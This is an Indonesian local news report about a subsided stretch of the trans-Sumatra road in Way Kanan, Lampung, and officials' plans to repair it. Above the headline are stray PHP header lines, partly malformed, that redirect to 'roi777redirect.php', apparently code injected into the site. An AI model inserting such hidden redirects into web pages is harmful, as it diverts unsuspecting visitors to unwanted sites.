header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Jalinsum Amblas!!! Jajaran BBPJN tinjau Lokasi Dan Segera Diperbaiki -
Jalinsum Amblas!!! Jajaran BBPJN tinjau Lokasi Dan Segera Diperbaiki

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Mendapat Laporan dari pemerintah kabupaten waykanan tentang Retak/Amblas nya jalan lintas tengah Sumatera yang berada di kecamatan Blambangan umpu Kabupaten waykanan, jajaran Balai Besar pelaksanaan jalan Nasional (BBPJN) wilayah 5 Palembang melalui SKPD PU tugas pembantuan provinsi Lampung dan Konsultan supervisi Provinsi Lampung Langsung meninjau lokasi jalan yang mengalami Retak/amblas tersebut. Selasa Pagi (27/3)

Di dampingi jajaran Dinas PU bagian Bina marga Kabupaten waykanan, Aan, selaku SKPD PU tugas pembantuan provinsi Lampung menerangkan Amblas nya jalan itu di karnakan kondisi tanah di sebelah badan jalan tekstur tanah nya lembut sehingga menyebabkan tanah hampir longsor, saat ini pihak nya bersama konsultan supervisi yang mewakili BBPJN telah melakukan Survei dan langsung melakukan persiapan untuk segera di perbaiki.

“ini sebenarnya bencana alam ya, karena tanah nya hampir longsor, dan hari ini kami sudah melakukan survei dan segera mempersiapkan segala sesuatu nya, insyaallah secepatnya akan kami Tindak,” Terang Aan.

Ditempat yang sama, mewakili Dinas PU bagian Bina marga Kabupaten waykanan Ishak, ST. Menambahkan, apabila dalam minggu ini tidak diperbaiki maka di khawatirkan jalan tersebut semakin parah, oleh karena itu dalam minggu ini minimal harus sudah ada persiapan dan langsung action.

“minggu diusahakan minimal harus ada Action, saya sudah ngobrol sama pihak provinsi Alat berat (Eksafator) sudah langsung mobilisasi atau sudah menuju kesini, karena disini nanti akan dibuat Talut, Siring, dan akan di lakukan pemadatan tanah. maka nya harus memakai Alat berat, Nanti kalau alat berat sudah sampai akan langsung dikerjakan,” Tambah Ishak.

Terpisah, di hubungi oleh translampung.Com melalui telepon, Skretaris Daerah Kabupaten waykanan Saipul, S.Sos, M.IP. mengatakan sangat mengapresiasi Gerak cepat pihak BBPJN yang diwakili dari provinsi Lampung karena telah merespon laporan pemerintah Kabupaten waykanan tentang jalan itu dan langsung meninjau lokasi serta melakukan survei untuk segera memperbaiki jalan tersebut.

“Alhamdulillah, terimakasih kepada tim BBPJN wilayah V, yang segera memperbaiki jalan negara dimaksud, karena ini kalau tidak di perbaiki akan mengganggu arus barang dan jasa yang melintas, oleh karena itu sekali lagi saya ucapkan terimakasih,” pungkas nya. (migo)

News Reporter